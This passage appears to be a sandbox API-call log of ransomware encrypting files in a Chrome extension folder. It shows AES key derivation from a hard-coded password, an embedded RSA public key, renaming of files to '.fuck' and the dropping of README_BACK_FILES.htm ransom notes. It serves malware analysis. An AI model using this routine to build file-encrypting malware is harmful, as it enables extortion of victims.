szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2940a00) returned 1 [0249.946] CryptCreateHash (in: hProv=0x2940a00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0249.946] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0249.946] CryptHashData (hHash=0x29387f8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.946] CryptDeriveKey (in: hProv=0x2940a00, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938978) returned 1 [0249.946] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.946] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0249.946] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2940a88) returned 1 [0249.947] CryptImportPublicKeyInfo (in: hCryptProv=0x2940a88, dwCertEncodingType=0x1, pInfo=0x29333c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29333f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29333f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29381f8) returned 1 [0249.947] CryptEncrypt (in: hKey=0x29381f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0249.947] CryptEncrypt (in: hKey=0x29381f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940648*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2940648*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0249.947] WriteFile (in: hFile=0x5d50, lpBuffer=0x2940648*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2940648*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0249.948] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.964] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.964] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.979] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x6c, lpOverlapped=0x0) returned 1 [0249.979] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x6c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x70) returned 1 [0249.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x70, lpOverlapped=0x0) returned 1 [0249.980] CloseHandle (hObject=0x5d54) returned 1 [0249.980] CloseHandle (hObject=0x5d50) returned 1 [0249.980] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), bFailIfExists=0) returned 1 [0249.983] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0249.984] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg")) returned 1 [0249.985] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.fuck")) returned 1 [0249.987] CryptDestroyHash (hHash=0x29387f8) returned 1 [0249.987] CryptDestroyKey (hKey=0x2938978) returned 1 [0249.987] CryptReleaseContext (hProv=0x2940a00, dwFlags=0x0) returned 1 [0249.987] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0249.987] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x29387b8 [0250.005] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.005] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.005] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.006] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.006] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.006] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.006] GetLastError () returned 0x0 [0250.006] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json")) returned 0x20 [0250.007] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0250.007] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.008] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.008] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.009] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29406d0) returned 1 [0250.011] CryptCreateHash (in: hProv=0x29406d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.011] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.011] CryptHashData (hHash=0x2938978, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.011] CryptDeriveKey (in: hProv=0x29406d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938338) returned 1 [0250.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.011] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29408f0) returned 1 [0250.012] CryptImportPublicKeyInfo (in: hCryptProv=0x29408f0, dwCertEncodingType=0x1, pInfo=0x2933490*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29334c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29334c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937b78) returned 1 [0250.012] CryptEncrypt (in: hKey=0x2937b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.012] CryptEncrypt (in: hKey=0x2937b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940758*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2940758*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.012] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2940758*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2940758*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.013] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x116, lpOverlapped=0x0) returned 1 [0250.017] CryptEncrypt (in: hKey=0x2938338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x116, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.017] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.017] CloseHandle (hObject=0x5d58) returned 1 [0250.018] CloseHandle (hObject=0x5d5c) returned 1 [0250.018] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0250.021] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0250.022] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0250.024] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0250.025] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.025] CryptDestroyKey (hKey=0x2938338) returned 1 [0250.025] CryptReleaseContext (hProv=0x29406d0, dwFlags=0x0) returned 1 [0250.025] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.025] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.025] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0250.025] AreFileApisANSI () returned 1 [0250.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.026] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.026] GetFileType (hFile=0x5d54) returned 0x1 [0250.026] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.027] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.027] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.027] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.027] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.028] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.028] GetLastError () returned 0x0 [0250.028] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json")) returned 0x20 [0250.028] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0250.028] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.029] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.030] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.030] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.032] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.032] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.032] CryptHashData (hHash=0x2938978, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.032] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937fb8) returned 1 [0250.032] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.032] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.032] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29407e0) returned 1 [0250.033] CryptImportPublicKeyInfo (in: hCryptProv=0x29407e0, dwCertEncodingType=0x1, pInfo=0x29349b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29349e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29349e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937cf8) returned 1 [0250.033] CryptEncrypt (in: hKey=0x2937cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.033] CryptEncrypt (in: hKey=0x2937cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29406d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29406d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.033] WriteFile (in: hFile=0x5d58, lpBuffer=0x29406d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29406d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.034] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x13f, lpOverlapped=0x0) returned 1 [0250.036] CryptEncrypt (in: hKey=0x2937fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x13f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0250.036] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0250.036] CloseHandle (hObject=0x5d5c) returned 1 [0250.036] CloseHandle (hObject=0x5d58) returned 1 [0250.036] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0250.039] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0250.040] DeleteFileA 